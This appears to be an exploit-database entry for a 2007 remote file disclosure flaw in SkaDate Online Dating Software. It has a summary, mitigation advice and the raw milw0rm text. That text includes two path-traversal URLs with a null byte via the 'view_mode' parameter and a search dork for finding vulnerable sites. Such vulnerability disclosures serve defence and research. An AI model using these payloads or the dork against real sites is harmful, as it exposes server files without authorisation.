header-logo
Suggest Exploit
vendor:
SkaDate Online Dating Software
by:
SnIpEr-SA.CoM
5.5
CVSS
MEDIUM
Remote File Disclosure
98
CWE
Product Name: SkaDate Online Dating Software
Affected Version From: 5
Affected Version To: 6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SkaDate Online Dating Software Remote File Disclosure Vulnerability

The vulnerability allows an attacker to disclose files on the target system by exploiting a file inclusion vulnerability in the SkaDate Online Dating Software. By manipulating the 'view_mode' parameter in the 'featured_list.php' and 'online_list.php' files, an attacker can traverse the file system and access sensitive files.

Mitigation:

The vendor should release a patch or update to fix the file inclusion vulnerability. In the meantime, users should restrict access to the affected files and implement proper input validation to prevent directory traversal attacks.
Source

Exploit-DB raw data:

# SkaDate Online Dating Software Remote File Disclosure Vulnerability
# Author : SnIpEr-SA.CoM
# tested verson : 5.0 & 6.0
# Homepage : http://www.skadate.com
# Price: 795.00
# Exp :
# http://www.site.com/member/featured_list.php?view_mode=../../../../file%00
#
# http://www.site.com/member/online_list.php?view_mode=../../../../file%00


# Open Source Code, [o.0]

# dork : Powered by SkaDate Dating 

# milw0rm.com [2007-10-06]

Navigation

Suggest Exploit

Services By CQR